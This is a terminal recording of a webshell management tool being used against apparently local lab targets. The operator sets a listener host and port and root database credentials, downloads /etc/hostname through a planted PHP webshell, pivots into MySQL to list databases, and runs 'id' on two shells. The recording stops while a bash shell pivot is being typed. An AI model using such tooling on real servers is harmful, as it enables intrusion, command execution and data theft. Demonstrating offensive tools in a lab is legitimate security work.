[20.9915, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102met DB_ENGINE mysql\u001b[18D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.0535, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.1157, "o", "\u001b[?25l\u001b[?7l\u001b[2D\u001b[0;32mset\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.1777, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.2398, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mD\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.3025, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mB\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.3647, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m_\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.4264, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mH\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.4889, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mO\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.5517, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mS\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.6138, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mT\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.6755, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.7372, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.7989, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.8606, "o", "\u001b[?25l\u001b[?7l\u001b[43D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mset\u001b[0m \u001b[0;33mDB_HOST\u001b[0m \u001b[0;33mdb\u001b[43D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[21.8614, "o", "\u001b[1;32m[+] DB_HOST => db\u001b[0m\r\n"]
[21.8619, "o", "\u001b[6n"]
[21.8625, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[21.8633, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.567, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102met DB_HOST db\u001b[13D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.6287, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.6908, "o", "\u001b[?25l\u001b[?7l\u001b[2D\u001b[0;32mset\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.7525, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.8142, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mD\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.8759, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mB\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.9376, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m_\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.9997, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mU\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.0613, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mS\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.123, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mE\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.1849, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mR\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.2467, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.3084, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.3701, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.4319, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.4936, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.5553, "o", "\u001b[?25l\u001b[?7l\u001b[45D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mset\u001b[0m \u001b[0;33mDB_USER\u001b[0m \u001b[0;33mroot\u001b[45D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.5553, "o", "\u001b[?2004l"]
[23.5559, "o", "\u001b[1;32m[+] DB_USER => root\u001b[0m\r\n"]
[23.5564, "o", "\u001b[6n"]
[23.5571, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.5578, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.2616, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102met DB_USER root\u001b[15D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.3232, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.3849, "o", "\u001b[?25l\u001b[?7l\u001b[2D\u001b[0;32mset\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.4466, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.5082, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mD\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.57, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mB\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.632, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m_\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.6937, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mP\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.7555, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mA\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.8172, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mS\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.8789, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mS\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.9406, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.0023, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.0639, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.1256, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.1873, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.2491, "o", "\u001b[?25l\u001b[?7l\u001b[45D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mset\u001b[0m \u001b[0;33mDB_PASS\u001b[0m \u001b[0;33mroot\u001b[45D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[25.2497, "o", "\u001b[1;32m[+] DB_PASS => root\u001b[0m\r\n"]
[25.2502, "o", "\u001b[6n"]
[25.2508, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.2526, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.9575, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.0201, "o", "\u001b[?25l\u001b[?7l\u001b[0mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.0826, "o", "\u001b[?25l\u001b[?7l\u001b[0mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.1451, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.2073, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.2689, "o", "\u001b[?25l\u001b[?7l\u001b[0mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.3306, "o", "\u001b[?25l\u001b[?7l\u001b[6D\u001b[0;32moptions\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.3922, "o", "\u001b[?25l\u001b[?7l\u001b[36D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32moptions\u001b[36D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[26.3937, "o", "\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\r\n\u2503\u001b[1;36m \u001b[0m\u001b[1;36msetting  \u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36mvalue     \u001b[0m\u001b[1;36m \u001b[0m\u2503\r\n\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\r\n\u2502 LHOST     \u2502 172.16.1.1 \u2502\r\n\u2502 LPORT     \u2502 4444       \u2502\r\n\u2502 RANGE     \u2502            \u2502\r\n\u2502 PORTS     \u2502            \u2502\r\n\u2502 DB_ENGINE \u2502 mysql      \u2502\r\n\u2502 DB_HOST   \u2502 db         \u2502\r\n\u2502 DB_USER   \u2502 root       \u2502\r\n\u2502 DB_PASS   \u2502 root       \u2502\r\n\u2502 DB_NAME   \u2502            \u2502\r\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\r\n"]
[26.3942, "o", "\u001b[6n"]
[26.3949, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.3957, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.4042, "o", "\u001b[?25l\u001b[?7l\u001b[0md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.4667, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.5284, "o", "\u001b[?25l\u001b[?7l\u001b[0mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.5901, "o", "\u001b[?25l\u001b[?7l\u001b[0mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.6517, "o", "\u001b[?25l\u001b[?7l\u001b[0ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.7133, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.7749, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.8367, "o", "\u001b[?25l\u001b[?7l\u001b[7D\u001b[0;36mdownload\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.8985, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.9605, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.0222, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.0841, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.1459, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.2076, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.2694, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.3318, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.3935, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.4556, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.5174, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.5792, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.6413, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.7031, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.7648, "o", "\u001b[?25l\u001b[?7l\u001b[51D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;36mdownload\u001b[0m \u001b[0;33m/etc/hostname\u001b[51D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.7648, "o", "\u001b[?2004l"]
[29.7664, "o", "\u001b[95m[+] [download] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[29.7708, "o", "\u001b[1;32m[+] Saved /etc/hostname -> \u001b[0m\r\n\u001b[1;32m/home/ubuntu/Documents/dev/WangYihang/Webshell-Sniper/127.0.0.1:8080/etc/hostname (13 bytes)\u001b[0m\r\n"]
[29.7713, "o", "\u001b[6n"]
[29.772, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.7729, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[31.5807, "o", "\u001b[?25l\u001b[?7l\u001b[0mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[31.6422, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[31.704, "o", "\u001b[?25l\u001b[?7l\u001b[0mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[31.7656, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[31.8272, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mpivot\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[31.8888, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[31.9505, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[32.0122, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[32.0738, "o", "\u001b[?25l\u001b[?7l\u001b[37D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mpivot\u001b[0m \u001b[0;33mdb\u001b[37D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[32.0738, "o", "\u001b[?2004l"]
[32.0752, "o", "\u001b[95m[+] [database:mysql] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[32.0775, "o", "\u001b[1;32m[+] Connected.\u001b[0m\r\n"]
[32.0849, "o", "\u001b[6n"]
[32.0864, "o", "\u001b[?2004h\u001b[?1l\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m >\u001b[6D\u001b[7C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[32.089, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.2776, "o", "\u001b[?25l\u001b[?7l\u001b[0md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.3393, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.401, "o", "\u001b[?25l\u001b[?7l\u001b[0mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.4626, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.5242, "o", "\u001b[?25l\u001b[?7l\u001b[0mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.5857, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.6474, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.7091, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.7708, "o", "\u001b[?25l\u001b[?7l\u001b[8D\u001b[0;32mdatabases\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.8325, "o", "\u001b[?25l\u001b[?7l\u001b[16D\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m > \u001b[0;32mdatabases\u001b[16D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[34.8386, "o", "\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\r\n\u2503\u001b[1;36m \u001b[0m\u001b[1;36mDatabase/Schema   \u001b[0m\u001b[1;36m \u001b[0m\u2503\r\n\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\r\n\u2502 mysql              \u2502\r\n\u2502 information_schema \u2502\r\n\u2502 performance_schema \u2502\r\n\u2502 sys                \u2502\r\n\u2502 benchmark          \u2502\r\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\r\n"]
[34.839, "o", "\u001b[6n"]
[34.8397, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m >\u001b[6D\u001b[7C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.8404, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.4485, "o", "\u001b[?25l\u001b[?7l\u001b[0mq\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.51, "o", "\u001b[?25l\u001b[?7l\u001b[0mu\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.5717, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.6333, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mquit\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.6949, "o", "\u001b[?25l\u001b[?7l\u001b[11D\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m > \u001b[0;32mquit\u001b[11D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.6949, "o", "\u001b[?2004l"]
[36.696, "o", "\u001b[6n"]
[36.6967, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.6975, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.7021, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102met DB_PASS root\u001b[15D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.7637, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.8253, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102msions\u001b[0m\u001b[K\u001b[5D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.887, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.9486, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.0102, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.0727, "o", "\u001b[?25l\u001b[?7l\u001b[0mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.1343, "o", "\u001b[?25l\u001b[?7l\u001b[7D\u001b[0;32msessions\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.1961, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.2579, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.32, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m-c\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.3817, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.4433, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.505, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.5668, "o", "\u001b[?25l\u001b[?7l\u001b[43D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32msessions\u001b[0m \u001b[0;31m-c\u001b[0m \u001b[0;33mid\u001b[43D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.5668, "o", "\u001b[?2004l"]
[38.5674, "o", "\u001b[95m[+] [broadcast] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[38.57, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\n"]
[38.5701, "o", "\u001b[95m[+] [broadcast] POST http://127.0.0.1:8080/c2.php (password='c')\u001b[0m\r\n"]
[38.5742, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\n"]
[38.5751, "o", "\u001b[6n"]
[38.576, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.5768, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.7864, "o", "\u001b[?25l\u001b[?7l\u001b[0mp\u001b[0;38;2;102;102;102mivot db\u001b[7D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.8482, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.9098, "o", "\u001b[?25l\u001b[?7l\u001b[0mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.9718, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.0334, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mpivot\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.0951, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.1569, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.2187, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.2803, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.3421, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.4038, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.4655, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.5272, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.5891, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m-m\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.6511, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.7129, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.7746, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.8364, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.8981, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.9598, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.0216, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.0833, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.1459, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.2086, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
